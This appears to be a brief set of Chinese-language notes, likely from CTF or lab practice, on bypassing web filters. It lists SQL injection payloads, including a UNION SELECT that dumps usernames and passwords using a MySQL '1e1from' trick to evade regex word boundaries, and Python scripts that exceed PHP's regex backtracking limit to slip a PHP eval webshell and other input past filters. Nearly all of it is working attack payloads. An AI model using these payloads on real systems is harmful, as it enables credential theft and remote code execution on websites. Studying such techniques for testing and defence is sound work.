1、绕过
?id=1' and 1=2 order by 3--+
?id=1%27%20and%201=2%20order%20by%203--+
1e1from
MySQL的科学计数法1e1和from合在一起绕过\b
?id=-1' union select 1,group_concat(username,0x3a,password),1e1from users--++
?id=-1%27%20union%20select%201,group_concat(username,0x3a,password),1e1from%20users--+
2、绕过回溯限制
PHP中文10w英文100W限制回溯
插入100w超过回溯限制
import requests
files = {
‘file’: ‘aaa<?php eval($_POST[txt]);//’ + ‘a’ * 1000000
}
res = requests.post(‘http://127.0.0.1/index.php’, data=files)
print(res.headers)
3、使用字符串匹配!==严格不相等,类型不同,也就不同
4、利用回溯绕过限制
import requests
datas = {
‘greeting’: ‘MerryChristmas’ + ‘a’*100000
}
res = requests.post(‘http://127.0.0.1/demo4.php’, data=datas)
print(res.headers)